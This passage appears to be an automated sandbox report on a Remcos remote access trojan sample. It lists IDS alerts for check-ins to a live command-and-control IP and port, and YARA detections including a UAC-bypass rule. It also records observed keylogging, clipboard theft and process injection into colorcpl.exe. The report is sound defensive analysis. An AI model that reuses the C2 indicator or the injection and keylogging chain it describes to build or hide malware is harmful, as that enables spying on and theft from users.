Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E07357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_02E07357

                      Networking

                      barindex
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49705 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49716 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49735 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49722 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49702 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49708 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49709 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49732 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49746 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49736 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49698 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49721 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49703 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49696 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49737 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49724 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49748 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49711 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49723 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49693 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49734 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49733 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49742 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49699 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49718 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49712 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49707 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49728 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49710 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49697 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49714 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49704 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49706 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49740 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49731 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49719 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49747 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49744 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49739 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49738 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49745 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49720 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49743 -> 196.251.83.79:786
                      Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49741 -> 196.251.83.79:786
                      Source: Malware configuration extractor IPs: 196.251.83.79
                      Source: global traffic TCP traffic: 192.168.2.6:49693 -> 196.251.83.79:786
                      Source: Joe Sandbox View ASN Name: SONIC-WirelessZA SONIC-WirelessZA
                      Source: unknown TCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E04574 WaitForSingleObject,SetEvent,recv, 8_2_02E04574
                      Source: colorcpl.exe String found in binary or memory: http://geoplugin.net/json.gp
                      Source: x.exe, 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007EDE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020693000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234397390.000000007EDF4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E09D1E SetWindowsHookExA 0000000D,02E09D0A,00000000 8_2_02E09D1E
                      Source: C:\Windows\SysWOW64\colorcpl.exe Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exe
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E0B158 OpenClipboard,GetClipboardData,CloseClipboard, 8_2_02E0B158
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E1696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_02E1696E
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0301696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0301696E
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E09E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 8_2_02E09E4A
                      Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
                      Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E1CF2D SystemParametersInfoW, 8_2_02E1CF2D
                      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0301CF2D SystemParametersInfoW, 16_2_0301CF2D

                      System Summary

                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903380 NtWriteVirtualMemory,3_2_02903380
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903034 NtAllocateVirtualMemory,3_2_02903034
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,3_2_02909654
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,3_2_02909738
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029095CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_029095CC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903C04 NtQueueApcThread,3_2_02903C04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290421A GetThreadContext,SetThreadContext,NtResumeThread,3_2_0290421A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290421C GetThreadContext,SetThreadContext,NtResumeThread,3_2_0290421C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903032 NtAllocateVirtualMemory,3_2_02903032
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_02909578
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973380 NtWriteVirtualMemory,15_2_02973380
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973034 NtAllocateVirtualMemory,15_2_02973034
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,15_2_02979738
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973C04 NtQueueApcThread,15_2_02973C04
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297421C GetThreadContext,SetThreadContext,NtResumeThread,15_2_0297421C
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297421A GetThreadContext,SetThreadContext,NtResumeThread,15_2_0297421A
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979809 NtQueryInformationFile,NtReadFile,NtClose,15_2_02979809
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973032 NtAllocateVirtualMemory,15_2_02973032
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,15_2_02979654
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297341B NtWriteVirtualMemory,15_2_0297341B
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_029795CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_029795CC
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02979578
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,3_2_0290A634
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E16861 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_02E16861
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03016861 ExitWindowsEx,LoadLibraryA,GetProcAddress,16_2_03016861
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_028F20B4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_029789E2
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0294C9EE
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0295C94A
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0294CF65
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02944D79
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_029632F2
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02939210
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02973049
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_029591E3
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0297969B
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0294D60D
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02967730
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02963750
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0294D747
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02963521
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02957B11
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0295D8F0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_0294380B
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_029639AD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E1E29B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E373DA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E38380
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E2809D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E3E1E0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E421C0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E281D7
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E5412B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E3774C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E53472
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E2747E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E3E43D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E325A1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E4DAD9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E1F809
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E379F6
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E279F5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E3DFB1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E37F78
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E35F52
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E13CA0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E37CBD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E33C73
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_02E3DD82
Source: C:\Users\user\Links\Ekbmajrx.PIF | Code function: 15_2_029620B4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_03038380
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_030373DA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0301E29B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0305412B
